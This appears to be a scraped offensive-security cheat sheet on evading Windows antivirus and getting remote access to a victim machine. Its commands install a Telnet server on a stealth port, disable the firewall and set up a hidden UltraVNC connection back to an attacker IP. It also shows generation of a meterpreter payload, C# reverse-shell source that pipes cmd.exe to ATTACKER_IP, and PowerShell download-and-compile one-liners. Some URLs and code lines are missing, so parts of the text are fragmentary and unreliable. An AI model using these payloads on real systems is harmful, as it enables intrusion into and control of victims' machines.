AV Bypass

Telnet Server

Until Windows10, all Windows came with a Telnet server that you could install (as administrator) doing:

pkgmgr /iu:"TelnetServer" /quiet

Make it start when the system is started and run it now:

sc config TlntSVR start= auto obj= localsystem

Change telnet port (stealth) and disable firewall:

tlntadmn config port=80
netsh advfirewall set allprofiles state off


Download it from:

Execute winvnc.exe and configure the server:

  • Enable the option Disable TrayIcon

  • Set a password in VNC Password

  • Set a password in View-Only Password

Then, move the binary winvnc.exe and newly created file UltraVNC.ini inside the victim

Reverse connection

The attacker should execute inside his host the binary vncviewer.exe -listen 5900 so it will be prepared to catch a reverse VNC connection. Then, it should execute inside the victim: winwnc.exe [-autoreconnect] -connect <attacker_ip>::5900


Download it from:

git clone
cd GreatSCT/setup/
cd ..

Inside GreatSCT:

use 1
list #Listing available payloads
use 9
set lhost
sel lport 4444
generate #payload is the default name
#This will generate a meterpreter xml and a rcc file for msfconsole

Now start the lister with msfconsole -r file.rc and execute the xml payload with:

C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe payload.xml

Current defender will terminate the process very fast.

Compiling our own reverse shell

First C# Revershell

Compile it with:

c:\windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /t:exe /out:back2.exe C:\Users\Public\Documents\Back1.cs.txt

Use it with:

back.exe <ATTACKER_IP> <PORT>
using System;
using System.Text;
using System.IO;
using System.Diagnostics;
using System.ComponentModel;
using System.Linq;
using System.Net;
using System.Net.Sockets;
namespace ConnectBack
public class Program
static StreamWriter streamWriter;
public static void Main(string[] args)
using(TcpClient client = new TcpClient(args[0], System.Convert.ToInt32(args[1])))
using(Stream stream = client.GetStream())
using(StreamReader rdr = new StreamReader(stream))
streamWriter = new StreamWriter(stream);
StringBuilder strInput = new StringBuilder();
Process p = new Process();
p.StartInfo.FileName = "cmd.exe";
p.StartInfo.CreateNoWindow = true;
p.StartInfo.UseShellExecute = false;
p.StartInfo.RedirectStandardOutput = true;
p.StartInfo.RedirectStandardInput = true;
p.StartInfo.RedirectStandardError = true;
p.OutputDataReceived += new DataReceivedEventHandler(CmdOutputDataHandler);
strInput.Remove(0, strInput.Length);
private static void CmdOutputDataHandler(object sendingProcess, DataReceivedEventArgs outLine)
StringBuilder strOutput = new StringBuilder();
if (!String.IsNullOrEmpty(outLine.Data))
catch (Exception err) { }

C# using compiler

C:\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.Workflow.Compiler.exe REV.txt.txt


Automatic download and execution:

powershell -command "& { (New-Object Net.WebClient).DownloadFile('', '.\REV.txt') }" && powershell -command "& { (New-Object Net.WebClient).DownloadFile('', '.\Rev.Shell') }" && C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe REV.txt Rev.Shell
powershell -command "& { (New-Object Net.WebClient).DownloadFile('', '.\REV.txt') }" && powershell -command "& { (New-Object Net.WebClient).DownloadFile('', '.\Rev.Shell') }" && C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Workflow.Compiler.exe REV.txt Rev.Shell

C# obfuscators list:


sudo apt-get install mingw-w64
i686-w64-mingw32-g++ prometheus.cpp -o prometheus.exe -lws2_32 -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc

Merlin, Empire, Puppy, SalsaTools

Other tools

# Veil Framework:
# Shellter
# Sharpshooter
# Javascript Payload Stageless: --stageless --dotnetver 4 --payload js --output foo --rawscfile ./raw.txt --sandbox 1=contoso,2,3
# Stageless HTA Payload: --stageless --dotnetver 2 --payload hta --output foo --rawscfile ./raw.txt --sandbox 4 --smuggle --template mcafee
# Staged VBS: --payload vbs --delivery both --output foo --web --dns --shellcode --scfile ./csharpsc.txt --sandbox 1=contoso --smuggle --template mcafee --dotnetver 4
# Donut:
# Vulcan